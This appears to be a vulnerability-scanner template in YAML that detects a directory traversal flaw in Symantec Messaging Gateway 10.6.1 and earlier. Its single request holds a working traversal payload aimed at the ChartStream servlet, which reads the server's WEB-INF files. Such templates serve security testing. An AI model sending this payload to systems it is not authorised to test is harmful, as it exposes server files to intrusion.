id: symantec-messaging-gateway

info:
  name: Symantec Messaging Gateway LFI
  author: Random_Robbie
  severity: medium
  description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal
  tags: lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "struts-default.xml"

      - type: status
        status:
          - 200
